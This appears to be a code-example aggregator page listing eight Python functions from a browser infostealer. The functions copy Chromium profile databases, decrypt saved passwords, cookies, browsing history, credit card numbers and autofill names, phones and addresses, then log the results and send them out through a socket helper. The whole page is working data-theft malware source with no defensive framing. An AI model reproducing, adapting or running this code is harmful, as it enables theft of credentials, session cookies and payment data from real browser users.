Exemplo n.º 1
0
def credential_stealer(browser: dict, encryption_key: str) -> None:
    """ Steals credentials from a browser and places them into the logs directory """
    # Examine each profile
    profile_names = get_profiles(browser)
    for profile_name in profile_names:
        # Copy original sqlite3 database to access it without killing any active Chromium processes
        db_path = create_temp_file(browser, profile_name, 'Login Data')

        # Access sqlite3 database
        db_connection = sqlite3.connect(db_path)
        cursor = db_connection.cursor()

        # Extract encrypted credentials from database
        cursor.execute(
            'SELECT action_url, username_value, password_value FROM logins')
        data = cursor.fetchall()

        # Decrypt credentials
        credentials = [{
            'url': try_decrypt(url, encryption_key),
            'username': try_decrypt(username, encryption_key),
            'password': try_decrypt(password, encryption_key),
        } for url, username, password in data]

        # Logs credentials
        if credentials:
            log_file_name = profile_name + ' Credentials'
            log_data(credentials, browser['name'], log_file_name)
            socket_send_log(credentials, browser['name'], log_file_name)

        # Close sqlite3 connection
        cursor.close()
        db_connection.close()
Exemplo n.º 2
0
def history_stealer(browser: dict, encryption_key: str) -> None:
    """ Steals browser history and places them into the logs directory """
    # Examine each profile
    profile_names = get_profiles(browser)
    for profile_name in profile_names:
        # Copy original sqlite3 database to access it without killing any active Chromium processes
        db_path = create_temp_file(browser, profile_name, 'History')

        # Access sqlite3 database
        db_connection = sqlite3.connect(db_path)
        cursor = db_connection.cursor()

        # Extract history from database
        history = {
            'search_history': extract_search_history(cursor, encryption_key),
            'web_history': extract_web_history(cursor, encryption_key),
        }

        # Logs history
        if history:
            log_file_name = profile_name + ' History'
            log_data(history, browser['name'], log_file_name)
            socket_send_log(history, browser['name'], log_file_name)

        # Close sqlite3 connection
        cursor.close()
        db_connection.close()
Exemplo n.º 3
0
def extract_autofill(browser_name: str, profile_name: str, encryption_key: str,
                     db_cursor) -> None:
    """ Extracts data from the autofill table and places them into the logs directory """
    # Query data
    db_cursor.execute('SELECT name, value FROM autofill')

    # Process data
    data = [{
        'field': try_decrypt(name, encryption_key),
        'value': try_decrypt(value, encryption_key),
    } for name, value in db_cursor.fetchall()]

    # Log data
    if data:
        log_file_name = profile_name + ' Autofill Fields'
        log_data(data, browser_name, log_file_name)
        socket_send_log(data, browser_name, log_file_name)
Exemplo n.º 4
0
def extract_autofill_phones(browser_name: str, profile_name: str,
                            encryption_key: str, db_cursor) -> None:
    """ Extracts data from the autofill_profile_phones table and places them into the logs directory """
    # Query data
    db_cursor.execute('SELECT number FROM autofill_profile_phones')

    # Process data
    data = [
        try_decrypt(row[0], encryption_key) for row in db_cursor.fetchall()
    ]
    data = [number for number in set(data) if number]

    # Log data
    if data:
        log_file_name = profile_name + ' Autofill Phones'
        log_data(data, browser_name, log_file_name)
        socket_send_log(data, browser_name, log_file_name)
Exemplo n.º 5
0
def extract_credit_cards(browser_name: str, profile_name: str,
                         encryption_key: str, db_cursor) -> None:
    """ Extracts data from the credit_cards table and places them into the logs directory """
    # Query data
    query = 'SELECT card_number_encrypted, name_on_card, expiration_month, expiration_year FROM credit_cards'
    db_cursor.execute(query)

    # Process data
    data = [{
        'card_number': try_decrypt(encrypted_card_number, encryption_key),
        'name_on_card': try_decrypt(name, encryption_key),
        'expiration_month': try_decrypt(expr_month, encryption_key),
        'expiration_year': try_decrypt(expr_year, encryption_key),
    } for encrypted_card_number, name, expr_month, expr_year in
            db_cursor.fetchall()]

    # Log data
    if data:
        log_file_name = profile_name + ' Credit Cards'
        log_data(data, browser_name, log_file_name)
        socket_send_log(data, browser_name, log_file_name)
Exemplo n.º 6
0
def extract_autofill_addresses(browser_name: str, profile_name: str,
                               encryption_key: str, db_cursor) -> None:
    """ Extracts data from the autofill_profile_addresses table and places them into the logs directory """
    # Query data
    query = 'SELECT street_address, city, state, zip_code, country_code FROM autofill_profile_addresses'
    db_cursor.execute(query)

    # Process data
    data = [{
        'street_address': try_decrypt(street_address, encryption_key),
        'city': try_decrypt(city, encryption_key),
        'state': try_decrypt(state, encryption_key),
        'zip_code': try_decrypt(zip_code, encryption_key),
        'country_code': try_decrypt(country_code, encryption_key),
    } for street_address, city, state, zip_code, country_code in
            db_cursor.fetchall()]

    # Log data
    if data:
        log_file_name = profile_name + ' Autofill Addresses'
        log_data(data, browser_name, log_file_name)
        socket_send_log(data, browser_name, log_file_name)
Exemplo n.º 7
0
def extract_autofill_names(browser_name: str, profile_name: str,
                           encryption_key: str, db_cursor) -> None:
    """ Extracts data from the autofill_profile_names table and places them into the logs directory """
    # Query full name data
    db_cursor.execute('SELECT full_name FROM autofill_profile_names')
    names = [
        try_decrypt(row[0], encryption_key) for row in db_cursor.fetchall()
    ]

    # Extract titles if possible
    titles = [''] * len(names)
    try:
        db_cursor.execute(
            'SELECT honorific_prefix FROM autofill_profile_names')
        titles = [
            try_decrypt(row[0], encryption_key)
            for row in db_cursor.fetchall()
        ]
    except sqlite3.OperationalError:
        # ignore title if unable to extract any
        pass

    # Process data
    data = set()
    assert len(titles) == len(names)
    for title, full_name in zip(titles, names):
        # ignore title or full_name if None
        name = (title or '') + (full_name or '')
        if name:
            data.add(name)
    data = list(data)

    # Log data
    if data:
        log_file_name = profile_name + ' Autofill Names'
        log_data(data, browser_name, log_file_name)
        socket_send_log(data, browser_name, log_file_name)
Exemplo n.º 8
0
def cookie_stealer(browser: dict, encryption_key: str) -> None:
    """ Steals cookies from a browser and places them into the logs directory """
    # Examine each profile
    profile_names = get_profiles(browser)
    for profile_name in profile_names:
        # Copy original sqlite3 database to access it without killing any active Chromium processes
        db_path = create_temp_file(browser, profile_name, 'Cookies')

        # Access sqlite3 database
        db_connection = sqlite3.connect(db_path)
        cursor = db_connection.cursor()

        # Extract encrypted cookies from database
        cursor.execute(
            'SELECT host_key, path, name, encrypted_value, expires_utc FROM cookies'
        )
        data = cursor.fetchall()

        # Decrypt cookies
        cookie_jar = [{
            'host_key': try_decrypt(host_key, encryption_key),
            'path': try_decrypt(path, encryption_key),
            'name': try_decrypt(name, encryption_key),
            'value': try_decrypt(encrypted_value, encryption_key),
            'expires_utc': try_decrypt(expires_utc, encryption_key),
        } for host_key, path, name, encrypted_value, expires_utc in data]

        # Logs cookies
        if cookie_jar:
            log_file_name = profile_name + ' Cookies'
            log_data(cookie_jar, browser['name'], log_file_name)
            socket_send_log(cookie_jar, browser['name'], log_file_name)

        # Close sqlite3 connection
        cursor.close()
        db_connection.close()